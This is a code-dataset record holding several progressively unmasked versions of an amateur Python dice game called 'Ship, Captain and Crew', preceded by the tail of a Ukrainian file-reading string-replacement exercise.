"step-4": "'''\nФункція replace() може використовуватися для заміни будь-якого слова у рядку іншим словом.\nПрочитайте кожен рядок зі створеного у попередньому завданні файлу learning_python.txt і замініть слово Python назвою іншої мови,\nнаприклад C при виведенні на екран. Це завдання написати в окремій функції.\n'''\n\n\ndef reader():\n with open('possibilities.txt', 'r') as file1:\n file_lines = [x.strip() for x in file1.readlines()]\n for e in file_lines:\n n = e.replace('Python', 'C++')\n print(n)\n\n\nif __name__ == '__main__':\n reader()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def multi():
scc = [6, 5, 4]
sc = [6, 5]
cc = [5, 4]
crew = [4]
captain = [5]
ship = [6]
n = 0
while n <= 2:
inp = input('Hit enter to roll')
if inp == '':
roll5 = random.choices(range(1, 7), k=5)
print(roll5)
if set(scc).issubset(roll5):
result_scc = [i for i in roll5 if not i in scc or scc.remove(i)
]
total_scc = sum(result_scc)
inp_scc = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_scc == 'both':
print('Total score: ' + str(total_scc) + '.')
if inp_scc == 'neither':
roll2_scc = random.choices(range(1, 7), k=2)
print(roll2_scc)
inp_scc_none = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_scc_none == 'both':
total_scc_none = sum(roll2_scc)
print('Total score: ' + str(total_scc_none) + '.')
if inp_scc_none == 'neither':
roll2_scc_none = random.choices(range(1, 7), k=2)
total_scc_none2 = sum(roll2_scc_none)
print(roll2_scc_none)
print('Your total score is: ' + str(total_scc_none2
) + '.')
if inp_scc_none == 'one':
inp_scc_none_one = input(
'Which die do you want to keep? ')
roll1_scc_none_one = random.randint(1, 6)
total_scc_none_one = roll1_scc_none_one + int(
inp_scc_none_one)
print(roll1_scc_none_one)
print('Your total score is: ' + str(
total_scc_none_one) + '.')
if inp_scc == 'one':
inp_scc_one = input('Which die do you want to keep? ')
roll1_scc_one = random.randint(1, 6)
print(roll1_scc_one)
total_scc_one = roll1_scc_one + int(inp_scc_one)
inp_scc_one2 = input(
"Hit enter to roll again or type 'pass' to keep your score "
)
if inp_scc_one2 == 'pass':
print('Your total score is: ' + str(total_scc_one) +
'.')
if inp_scc_one2 == '':
roll1_scc_one2 = random.randint(1, 6)
print(roll1_scc_one2)
total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)
print('Your total score is: ' + str(total_scc_one2) +
'.')
if set(sc).issubset(roll5):
inp_sc = input(
'Now you need a 4(the Crew). Hit enter to roll the remaining dice'
)
if inp_sc == '':
roll3 = random.choices(range(1, 7), k=3)
print(roll3)
if set(crew).issubset(roll3):
result_crew = [i for i in roll3 if not i in crew or
crew.remove(i)]
total_crew = sum(result_crew)
inp_crew = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_crew == 'both':
print('Total score: ' + str(total_crew) + '.')
if inp_crew == 'neither':
roll2_crew = random.choices(range(1, 7), k=2)
print(roll2_crew)
total_crew_none = sum(roll2_crew)
print('Your total score is: ' + str(
total_crew_none) + '.')
if inp_crew == 'one':
inp_crew_one = input(
'Which die do you want to keep? ')
roll1_crew_one = random.randint(1, 6)
print(roll1_crew_one)
total_crew_one = roll1_crew_one + int(inp_crew_one)
print('Your total score is: ' + str(
total_crew_one) + '.')
else:
inp_sc3 = input('Still no 4. Hit enter to roll again')
if inp_sc3 == '':
roll3_sc3 = random.choices(range(1, 7), k=3)
print(roll3_sc3)
if set(crew).issubset(roll3_sc3):
result_crew_sc3 = [i for i in roll3_sc3 if
not i in crew or crew.remove(i)]
total_crew_sc3 = sum(result_crew_sc3)
print('Your total score is: ' + str(
total_crew_sc3) + '.')
else:
print(
"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed."
)
if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:
inp_ship = input(
'Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice '
)
if inp_ship == '':
roll4_ship = random.choices(range(1, 7), k=4)
print(roll4_ship)
if set(cc).issubset(roll4_ship):
result_ship_cc = [i for i in roll4_ship if not i in
cc or cc.remove(i)]
total_ship_cc = sum(result_ship_cc)
inp_ship_cc = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_ship_cc == 'both':
print('Your total is: ' + str(total_ship_cc) + '.')
if inp_ship_cc == 'neither':
roll2_cc = random.choices(range(1, 7), k=2)
print(roll2_cc)
total_ship_cc_none = sum(roll2_cc)
print('Your total score is: ' + str(
total_ship_cc_none) + '.')
if inp_ship_cc == 'one':
inp_ship_cc_one = input(
'Which die do you want to keep? ')
roll1_ship_cc_one = random.randint(1, 6)
print(roll1_ship_cc_one)
total_ship_cc_one = roll1_ship_cc_one + int(
inp_ship_cc_one)
print('Your total score is: ' + str(
total_ship_cc_one) + '.')
if set(captain).issubset(roll4_ship):
roll3_captain = random.choices(range(1, 7), k=3)
print(roll3_captain)
if set(crew).issubset(roll3_captain):
result_ship_captain = [i for i in roll3_captain if
not i in crew or crew.remove(i)]
total_ship_captain = sum(result_ship_captain)
print('Your total score is: ' + str(
total_ship_captain) + '.')
else:
print(
"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed."
)
else:
n = n + 1
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def multi():
scc = [6, 5, 4]
sc = [6, 5]
cc = [5, 4]
crew = [4]
captain = [5]
ship = [6]
n = 0
while n <= 2:
inp = input('Hit enter to roll')
if inp == '':
roll5 = random.choices(range(1, 7), k=5)
print(roll5)
if set(scc).issubset(roll5):
result_scc = [i for i in roll5 if not i in scc or scc.remove(i)
]
total_scc = sum(result_scc)
inp_scc = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_scc == 'both':
print('Total score: ' + str(total_scc) + '.')
if inp_scc == 'neither':
roll2_scc = random.choices(range(1, 7), k=2)
print(roll2_scc)
inp_scc_none = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_scc_none == 'both':
total_scc_none = sum(roll2_scc)
print('Total score: ' + str(total_scc_none) + '.')
if inp_scc_none == 'neither':
roll2_scc_none = random.choices(range(1, 7), k=2)
total_scc_none2 = sum(roll2_scc_none)
print(roll2_scc_none)
print('Your total score is: ' + str(total_scc_none2
) + '.')
if inp_scc_none == 'one':
inp_scc_none_one = input(
'Which die do you want to keep? ')
roll1_scc_none_one = random.randint(1, 6)
total_scc_none_one = roll1_scc_none_one + int(
inp_scc_none_one)
print(roll1_scc_none_one)
print('Your total score is: ' + str(
total_scc_none_one) + '.')
if inp_scc == 'one':
inp_scc_one = input('Which die do you want to keep? ')
roll1_scc_one = random.randint(1, 6)
print(roll1_scc_one)
total_scc_one = roll1_scc_one + int(inp_scc_one)
inp_scc_one2 = input(
"Hit enter to roll again or type 'pass' to keep your score "
)
if inp_scc_one2 == 'pass':
print('Your total score is: ' + str(total_scc_one) +
'.')
if inp_scc_one2 == '':
roll1_scc_one2 = random.randint(1, 6)
print(roll1_scc_one2)
total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)
print('Your total score is: ' + str(total_scc_one2) +
'.')
if set(sc).issubset(roll5):
inp_sc = input(
'Now you need a 4(the Crew). Hit enter to roll the remaining dice'
)
if inp_sc == '':
roll3 = random.choices(range(1, 7), k=3)
print(roll3)
if set(crew).issubset(roll3):
result_crew = [i for i in roll3 if not i in crew or
crew.remove(i)]
total_crew = sum(result_crew)
inp_crew = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_crew == 'both':
print('Total score: ' + str(total_crew) + '.')
if inp_crew == 'neither':
roll2_crew = random.choices(range(1, 7), k=2)
print(roll2_crew)
total_crew_none = sum(roll2_crew)
print('Your total score is: ' + str(
total_crew_none) + '.')
if inp_crew == 'one':
inp_crew_one = input(
'Which die do you want to keep? ')
roll1_crew_one = random.randint(1, 6)
print(roll1_crew_one)
total_crew_one = roll1_crew_one + int(inp_crew_one)
print('Your total score is: ' + str(
total_crew_one) + '.')
else:
inp_sc3 = input('Still no 4. Hit enter to roll again')
if inp_sc3 == '':
roll3_sc3 = random.choices(range(1, 7), k=3)
print(roll3_sc3)
if set(crew).issubset(roll3_sc3):
result_crew_sc3 = [i for i in roll3_sc3 if
not i in crew or crew.remove(i)]
total_crew_sc3 = sum(result_crew_sc3)
print('Your total score is: ' + str(
total_crew_sc3) + '.')
else:
print(
"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed."
)
if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:
inp_ship = input(
'Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice '
)
if inp_ship == '':
roll4_ship = random.choices(range(1, 7), k=4)
print(roll4_ship)
if set(cc).issubset(roll4_ship):
result_ship_cc = [i for i in roll4_ship if not i in
cc or cc.remove(i)]
total_ship_cc = sum(result_ship_cc)
inp_ship_cc = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_ship_cc == 'both':
print('Your total is: ' + str(total_ship_cc) + '.')
if inp_ship_cc == 'neither':
roll2_cc = random.choices(range(1, 7), k=2)
print(roll2_cc)
total_ship_cc_none = sum(roll2_cc)
print('Your total score is: ' + str(
total_ship_cc_none) + '.')
if inp_ship_cc == 'one':
inp_ship_cc_one = input(
'Which die do you want to keep? ')
roll1_ship_cc_one = random.randint(1, 6)
print(roll1_ship_cc_one)
total_ship_cc_one = roll1_ship_cc_one + int(
inp_ship_cc_one)
print('Your total score is: ' + str(
total_ship_cc_one) + '.')
if set(captain).issubset(roll4_ship):
roll3_captain = random.choices(range(1, 7), k=3)
print(roll3_captain)
if set(crew).issubset(roll3_captain):
result_ship_captain = [i for i in roll3_captain if
not i in crew or crew.remove(i)]
total_ship_captain = sum(result_ship_captain)
print('Your total score is: ' + str(
total_ship_captain) + '.')
else:
print(
"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed."
)
else:
n = n + 1
<|reserved_special_token_0|>
for i in players:
multi()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def multi():
scc = [6, 5, 4]
sc = [6, 5]
cc = [5, 4]
crew = [4]
captain = [5]
ship = [6]
n = 0
while n <= 2:
inp = input('Hit enter to roll')
if inp == '':
roll5 = random.choices(range(1, 7), k=5)
print(roll5)
if set(scc).issubset(roll5):
result_scc = [i for i in roll5 if not i in scc or scc.remove(i)
]
total_scc = sum(result_scc)
inp_scc = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_scc == 'both':
print('Total score: ' + str(total_scc) + '.')
if inp_scc == 'neither':
roll2_scc = random.choices(range(1, 7), k=2)
print(roll2_scc)
inp_scc_none = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_scc_none == 'both':
total_scc_none = sum(roll2_scc)
print('Total score: ' + str(total_scc_none) + '.')
if inp_scc_none == 'neither':
roll2_scc_none = random.choices(range(1, 7), k=2)
total_scc_none2 = sum(roll2_scc_none)
print(roll2_scc_none)
print('Your total score is: ' + str(total_scc_none2
) + '.')
if inp_scc_none == 'one':
inp_scc_none_one = input(
'Which die do you want to keep? ')
roll1_scc_none_one = random.randint(1, 6)
total_scc_none_one = roll1_scc_none_one + int(
inp_scc_none_one)
print(roll1_scc_none_one)
print('Your total score is: ' + str(
total_scc_none_one) + '.')
if inp_scc == 'one':
inp_scc_one = input('Which die do you want to keep? ')
roll1_scc_one = random.randint(1, 6)
print(roll1_scc_one)
total_scc_one = roll1_scc_one + int(inp_scc_one)
inp_scc_one2 = input(
"Hit enter to roll again or type 'pass' to keep your score "
)
if inp_scc_one2 == 'pass':
print('Your total score is: ' + str(total_scc_one) +
'.')
if inp_scc_one2 == '':
roll1_scc_one2 = random.randint(1, 6)
print(roll1_scc_one2)
total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)
print('Your total score is: ' + str(total_scc_one2) +
'.')
if set(sc).issubset(roll5):
inp_sc = input(
'Now you need a 4(the Crew). Hit enter to roll the remaining dice'
)
if inp_sc == '':
roll3 = random.choices(range(1, 7), k=3)
print(roll3)
if set(crew).issubset(roll3):
result_crew = [i for i in roll3 if not i in crew or
crew.remove(i)]
total_crew = sum(result_crew)
inp_crew = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_crew == 'both':
print('Total score: ' + str(total_crew) + '.')
if inp_crew == 'neither':
roll2_crew = random.choices(range(1, 7), k=2)
print(roll2_crew)
total_crew_none = sum(roll2_crew)
print('Your total score is: ' + str(
total_crew_none) + '.')
if inp_crew == 'one':
inp_crew_one = input(
'Which die do you want to keep? ')
roll1_crew_one = random.randint(1, 6)
print(roll1_crew_one)
total_crew_one = roll1_crew_one + int(inp_crew_one)
print('Your total score is: ' + str(
total_crew_one) + '.')
else:
inp_sc3 = input('Still no 4. Hit enter to roll again')
if inp_sc3 == '':
roll3_sc3 = random.choices(range(1, 7), k=3)
print(roll3_sc3)
if set(crew).issubset(roll3_sc3):
result_crew_sc3 = [i for i in roll3_sc3 if
not i in crew or crew.remove(i)]
total_crew_sc3 = sum(result_crew_sc3)
print('Your total score is: ' + str(
total_crew_sc3) + '.')
else:
print(
"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed."
)
if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:
inp_ship = input(
'Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice '
)
if inp_ship == '':
roll4_ship = random.choices(range(1, 7), k=4)
print(roll4_ship)
if set(cc).issubset(roll4_ship):
result_ship_cc = [i for i in roll4_ship if not i in
cc or cc.remove(i)]
total_ship_cc = sum(result_ship_cc)
inp_ship_cc = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_ship_cc == 'both':
print('Your total is: ' + str(total_ship_cc) + '.')
if inp_ship_cc == 'neither':
roll2_cc = random.choices(range(1, 7), k=2)
print(roll2_cc)
total_ship_cc_none = sum(roll2_cc)
print('Your total score is: ' + str(
total_ship_cc_none) + '.')
if inp_ship_cc == 'one':
inp_ship_cc_one = input(
'Which die do you want to keep? ')
roll1_ship_cc_one = random.randint(1, 6)
print(roll1_ship_cc_one)
total_ship_cc_one = roll1_ship_cc_one + int(
inp_ship_cc_one)
print('Your total score is: ' + str(
total_ship_cc_one) + '.')
if set(captain).issubset(roll4_ship):
roll3_captain = random.choices(range(1, 7), k=3)
print(roll3_captain)
if set(crew).issubset(roll3_captain):
result_ship_captain = [i for i in roll3_captain if
not i in crew or crew.remove(i)]
total_ship_captain = sum(result_ship_captain)
print('Your total score is: ' + str(
total_ship_captain) + '.')
else:
print(
"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed."
)
else:
n = n + 1
inp = input('How many players are there? ')
players = range(int(inp))
roll_dict = dict()
for i in players:
multi()
<|reserved_special_token_1|>
import random
def multi():
scc = [6, 5, 4]
sc = [6, 5]
cc = [5, 4]
crew = [4]
captain = [5]
ship = [6]
n = 0
while n <= 2:
inp = input('Hit enter to roll')
if inp == '':
roll5 = random.choices(range(1, 7), k=5)
print(roll5)
if set(scc).issubset(roll5):
result_scc = [i for i in roll5 if not i in scc or scc.remove(i)
]
total_scc = sum(result_scc)
inp_scc = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_scc == 'both':
print('Total score: ' + str(total_scc) + '.')
if inp_scc == 'neither':
roll2_scc = random.choices(range(1, 7), k=2)
print(roll2_scc)
inp_scc_none = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_scc_none == 'both':
total_scc_none = sum(roll2_scc)
print('Total score: ' + str(total_scc_none) + '.')
if inp_scc_none == 'neither':
roll2_scc_none = random.choices(range(1, 7), k=2)
total_scc_none2 = sum(roll2_scc_none)
print(roll2_scc_none)
print('Your total score is: ' + str(total_scc_none2
) + '.')
if inp_scc_none == 'one':
inp_scc_none_one = input(
'Which die do you want to keep? ')
roll1_scc_none_one = random.randint(1, 6)
total_scc_none_one = roll1_scc_none_one + int(
inp_scc_none_one)
print(roll1_scc_none_one)
print('Your total score is: ' + str(
total_scc_none_one) + '.')
if inp_scc == 'one':
inp_scc_one = input('Which die do you want to keep? ')
roll1_scc_one = random.randint(1, 6)
print(roll1_scc_one)
total_scc_one = roll1_scc_one + int(inp_scc_one)
inp_scc_one2 = input(
"Hit enter to roll again or type 'pass' to keep your score "
)
if inp_scc_one2 == 'pass':
print('Your total score is: ' + str(total_scc_one) +
'.')
if inp_scc_one2 == '':
roll1_scc_one2 = random.randint(1, 6)
print(roll1_scc_one2)
total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)
print('Your total score is: ' + str(total_scc_one2) +
'.')
if set(sc).issubset(roll5):
inp_sc = input(
'Now you need a 4(the Crew). Hit enter to roll the remaining dice'
)
if inp_sc == '':
roll3 = random.choices(range(1, 7), k=3)
print(roll3)
if set(crew).issubset(roll3):
result_crew = [i for i in roll3 if not i in crew or
crew.remove(i)]
total_crew = sum(result_crew)
inp_crew = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_crew == 'both':
print('Total score: ' + str(total_crew) + '.')
if inp_crew == 'neither':
roll2_crew = random.choices(range(1, 7), k=2)
print(roll2_crew)
total_crew_none = sum(roll2_crew)
print('Your total score is: ' + str(
total_crew_none) + '.')
if inp_crew == 'one':
inp_crew_one = input(
'Which die do you want to keep? ')
roll1_crew_one = random.randint(1, 6)
print(roll1_crew_one)
total_crew_one = roll1_crew_one + int(inp_crew_one)
print('Your total score is: ' + str(
total_crew_one) + '.')
else:
inp_sc3 = input('Still no 4. Hit enter to roll again')
if inp_sc3 == '':
roll3_sc3 = random.choices(range(1, 7), k=3)
print(roll3_sc3)
if set(crew).issubset(roll3_sc3):
result_crew_sc3 = [i for i in roll3_sc3 if
not i in crew or crew.remove(i)]
total_crew_sc3 = sum(result_crew_sc3)
print('Your total score is: ' + str(
total_crew_sc3) + '.')
else:
print(
"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed."
)
if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:
inp_ship = input(
'Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice '
)
if inp_ship == '':
roll4_ship = random.choices(range(1, 7), k=4)
print(roll4_ship)
if set(cc).issubset(roll4_ship):
result_ship_cc = [i for i in roll4_ship if not i in
cc or cc.remove(i)]
total_ship_cc = sum(result_ship_cc)
inp_ship_cc = input(
'Do you wish to keep one, both, or neither of the remaining dice? '
)
if inp_ship_cc == 'both':
print('Your total is: ' + str(total_ship_cc) + '.')
if inp_ship_cc == 'neither':
roll2_cc = random.choices(range(1, 7), k=2)
print(roll2_cc)
total_ship_cc_none = sum(roll2_cc)
print('Your total score is: ' + str(
total_ship_cc_none) + '.')
if inp_ship_cc == 'one':
inp_ship_cc_one = input(
'Which die do you want to keep? ')
roll1_ship_cc_one = random.randint(1, 6)
print(roll1_ship_cc_one)
total_ship_cc_one = roll1_ship_cc_one + int(
inp_ship_cc_one)
print('Your total score is: ' + str(
total_ship_cc_one) + '.')
if set(captain).issubset(roll4_ship):
roll3_captain = random.choices(range(1, 7), k=3)
print(roll3_captain)
if set(crew).issubset(roll3_captain):
result_ship_captain = [i for i in roll3_captain if
not i in crew or crew.remove(i)]
total_ship_captain = sum(result_ship_captain)
print('Your total score is: ' + str(
total_ship_captain) + '.')
else:
print(
"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed."
)
else:
n = n + 1
inp = input('How many players are there? ')
players = range(int(inp))
roll_dict = dict()
for i in players:
multi()
<|reserved_special_token_1|>
import random
def multi():
scc = [6, 5, 4]
sc = [6, 5]
cc = [5, 4]
crew = [4]
captain = [5]
ship = [6]
n = 0
while n <= 2:
inp = input("Hit enter to roll")
if inp == "":
roll5 = random.choices(range(1, 7), k=5)
print(roll5)
if set(scc).issubset(roll5):
result_scc = [i for i in roll5 if not i in scc or scc.remove(i)]
total_scc = sum(result_scc)
inp_scc = input("Do you wish to keep one, both, or neither of the remaining dice? ")
if inp_scc == "both":
print("Total score: " + str(total_scc) + ".")
if inp_scc == "neither":
roll2_scc = random.choices(range(1, 7), k=2)
print(roll2_scc)
inp_scc_none = input("Do you wish to keep one, both, or neither of the remaining dice? ")
if inp_scc_none == "both":
total_scc_none = sum(roll2_scc)
print("Total score: " + str(total_scc_none) + ".")
if inp_scc_none == "neither":
roll2_scc_none = random.choices(range(1, 7), k=2)
total_scc_none2 = sum(roll2_scc_none)
print(roll2_scc_none)
print("Your total score is: " + str(total_scc_none2) + ".")
if inp_scc_none == "one":
inp_scc_none_one = input("Which die do you want to keep? ")
roll1_scc_none_one = random.randint(1, 6)
total_scc_none_one = roll1_scc_none_one + int(inp_scc_none_one)
print(roll1_scc_none_one)
print("Your total score is: " + str(total_scc_none_one) + ".")
if inp_scc == "one":
inp_scc_one = input("Which die do you want to keep? ")
roll1_scc_one = random.randint(1, 6)
print(roll1_scc_one)
total_scc_one = roll1_scc_one + int(inp_scc_one)
inp_scc_one2 = input("Hit enter to roll again or type 'pass' to keep your score ")
if inp_scc_one2 == "pass":
print("Your total score is: " + str(total_scc_one) + ".")
if inp_scc_one2 == "":
roll1_scc_one2 = random.randint(1, 6)
print(roll1_scc_one2)
total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)
print("Your total score is: " + str(total_scc_one2) + ".")
if set(sc).issubset(roll5):
inp_sc = input("Now you need a 4(the Crew). Hit enter to roll the remaining dice")
if inp_sc == "":
roll3 = random.choices(range(1, 7), k=3)
print(roll3)
if set(crew).issubset(roll3):
result_crew = [i for i in roll3 if not i in crew or crew.remove(i)]
total_crew = sum(result_crew)
inp_crew = input("Do you wish to keep one, both, or neither of the remaining dice? ")
if inp_crew == "both":
print("Total score: " + str(total_crew) + ".")
if inp_crew == "neither":
roll2_crew = random.choices(range(1, 7), k=2)
print(roll2_crew)
total_crew_none = sum(roll2_crew)
print("Your total score is: " + str(total_crew_none) + ".")
if inp_crew == "one":
inp_crew_one = input("Which die do you want to keep? ")
roll1_crew_one = random.randint(1, 6)
print(roll1_crew_one)
total_crew_one = roll1_crew_one + int(inp_crew_one)
print("Your total score is: " + str(total_crew_one) + ".")
else:
inp_sc3 = input("Still no 4. Hit enter to roll again")
if inp_sc3 == "":
roll3_sc3 = random.choices(range(1, 7), k=3)
print(roll3_sc3)
if set(crew).issubset(roll3_sc3):
result_crew_sc3 = [i for i in roll3_sc3 if not i in crew or crew.remove(i)]
total_crew_sc3 = sum(result_crew_sc3)
print("Your total score is: " + str(total_crew_sc3) + ".")
else:
print("Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.")
if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:
inp_ship = input(
"Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice ")
if inp_ship == "":
roll4_ship = random.choices(range(1, 7), k=4)
print(roll4_ship)
if set(cc).issubset(roll4_ship):
result_ship_cc = [i for i in roll4_ship if not i in cc or cc.remove(i)]
total_ship_cc = sum(result_ship_cc)
inp_ship_cc = input("Do you wish to keep one, both, or neither of the remaining dice? ")
if inp_ship_cc == "both":
print("Your total is: " + str(total_ship_cc) + ".")
if inp_ship_cc == "neither":
roll2_cc = random.choices(range(1, 7), k=2)
print(roll2_cc)
total_ship_cc_none = sum(roll2_cc)
print("Your total score is: " + str(total_ship_cc_none) + ".")
if inp_ship_cc == "one":
inp_ship_cc_one = input("Which die do you want to keep? ")
roll1_ship_cc_one = random.randint(1, 6)
print(roll1_ship_cc_one)
total_ship_cc_one = roll1_ship_cc_one + int(inp_ship_cc_one)
print("Your total score is: " + str(total_ship_cc_one) + ".")
if set(captain).issubset(roll4_ship):
roll3_captain = random.choices(range(1, 7), k=3)
print(roll3_captain)
if set(crew).issubset(roll3_captain):
result_ship_captain = [i for i in roll3_captain if not i in crew or crew.remove(i)]
total_ship_captain = sum(result_ship_captain)
print("Your total score is: " + str(total_ship_captain) + ".")
else:
print("Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.")
else:
n = n + 1
inp = input("How many players are there? ")
players = range(int(inp))
roll_dict = dict()
for i in players:
multi()
|
flexible
|
{
"blob_id": "bb540ba4cd96e2485e77ba099f0a1a9ea03e1120",
"index": 8144,
"step-1": "<mask token>\n\n\ndef multi():\n scc = [6, 5, 4]\n sc = [6, 5]\n cc = [5, 4]\n crew = [4]\n captain = [5]\n ship = [6]\n n = 0\n while n <= 2:\n inp = input('Hit enter to roll')\n if inp == '':\n roll5 = random.choices(range(1, 7), k=5)\n print(roll5)\n if set(scc).issubset(roll5):\n result_scc = [i for i in roll5 if not i in scc or scc.remove(i)\n ]\n total_scc = sum(result_scc)\n inp_scc = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_scc == 'both':\n print('Total score: ' + str(total_scc) + '.')\n if inp_scc == 'neither':\n roll2_scc = random.choices(range(1, 7), k=2)\n print(roll2_scc)\n inp_scc_none = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_scc_none == 'both':\n total_scc_none = sum(roll2_scc)\n print('Total score: ' + str(total_scc_none) + '.')\n if inp_scc_none == 'neither':\n roll2_scc_none = random.choices(range(1, 7), k=2)\n total_scc_none2 = sum(roll2_scc_none)\n print(roll2_scc_none)\n print('Your total score is: ' + str(total_scc_none2\n ) + '.')\n if inp_scc_none == 'one':\n inp_scc_none_one = input(\n 'Which die do you want to keep? ')\n roll1_scc_none_one = random.randint(1, 6)\n total_scc_none_one = roll1_scc_none_one + int(\n inp_scc_none_one)\n print(roll1_scc_none_one)\n print('Your total score is: ' + str(\n total_scc_none_one) + '.')\n if inp_scc == 'one':\n inp_scc_one = input('Which die do you want to keep? ')\n roll1_scc_one = random.randint(1, 6)\n print(roll1_scc_one)\n total_scc_one = roll1_scc_one + int(inp_scc_one)\n inp_scc_one2 = input(\n \"Hit enter to roll again or type 'pass' to keep your score \"\n )\n if inp_scc_one2 == 'pass':\n print('Your total score is: ' + str(total_scc_one) +\n '.')\n if inp_scc_one2 == '':\n roll1_scc_one2 = random.randint(1, 6)\n print(roll1_scc_one2)\n total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)\n print('Your total score is: ' + str(total_scc_one2) +\n '.')\n if set(sc).issubset(roll5):\n inp_sc = input(\n 'Now you need a 4(the Crew). Hit enter to roll the remaining dice'\n )\n if inp_sc == '':\n roll3 = random.choices(range(1, 7), k=3)\n print(roll3)\n if set(crew).issubset(roll3):\n result_crew = [i for i in roll3 if not i in crew or\n crew.remove(i)]\n total_crew = sum(result_crew)\n inp_crew = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_crew == 'both':\n print('Total score: ' + str(total_crew) + '.')\n if inp_crew == 'neither':\n roll2_crew = random.choices(range(1, 7), k=2)\n print(roll2_crew)\n total_crew_none = sum(roll2_crew)\n print('Your total score is: ' + str(\n total_crew_none) + '.')\n if inp_crew == 'one':\n inp_crew_one = input(\n 'Which die do you want to keep? ')\n roll1_crew_one = random.randint(1, 6)\n print(roll1_crew_one)\n total_crew_one = roll1_crew_one + int(inp_crew_one)\n print('Your total score is: ' + str(\n total_crew_one) + '.')\n else:\n inp_sc3 = input('Still no 4. Hit enter to roll again')\n if inp_sc3 == '':\n roll3_sc3 = random.choices(range(1, 7), k=3)\n print(roll3_sc3)\n if set(crew).issubset(roll3_sc3):\n result_crew_sc3 = [i for i in roll3_sc3 if \n not i in crew or crew.remove(i)]\n total_crew_sc3 = sum(result_crew_sc3)\n print('Your total score is: ' + str(\n total_crew_sc3) + '.')\n else:\n print(\n \"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\"\n )\n if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:\n inp_ship = input(\n 'Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice '\n )\n if inp_ship == '':\n roll4_ship = random.choices(range(1, 7), k=4)\n print(roll4_ship)\n if set(cc).issubset(roll4_ship):\n result_ship_cc = [i for i in roll4_ship if not i in\n cc or cc.remove(i)]\n total_ship_cc = sum(result_ship_cc)\n inp_ship_cc = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_ship_cc == 'both':\n print('Your total is: ' + str(total_ship_cc) + '.')\n if inp_ship_cc == 'neither':\n roll2_cc = random.choices(range(1, 7), k=2)\n print(roll2_cc)\n total_ship_cc_none = sum(roll2_cc)\n print('Your total score is: ' + str(\n total_ship_cc_none) + '.')\n if inp_ship_cc == 'one':\n inp_ship_cc_one = input(\n 'Which die do you want to keep? ')\n roll1_ship_cc_one = random.randint(1, 6)\n print(roll1_ship_cc_one)\n total_ship_cc_one = roll1_ship_cc_one + int(\n inp_ship_cc_one)\n print('Your total score is: ' + str(\n total_ship_cc_one) + '.')\n if set(captain).issubset(roll4_ship):\n roll3_captain = random.choices(range(1, 7), k=3)\n print(roll3_captain)\n if set(crew).issubset(roll3_captain):\n result_ship_captain = [i for i in roll3_captain if\n not i in crew or crew.remove(i)]\n total_ship_captain = sum(result_ship_captain)\n print('Your total score is: ' + str(\n total_ship_captain) + '.')\n else:\n print(\n \"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\"\n )\n else:\n n = n + 1\n\n\n<mask token>\n",
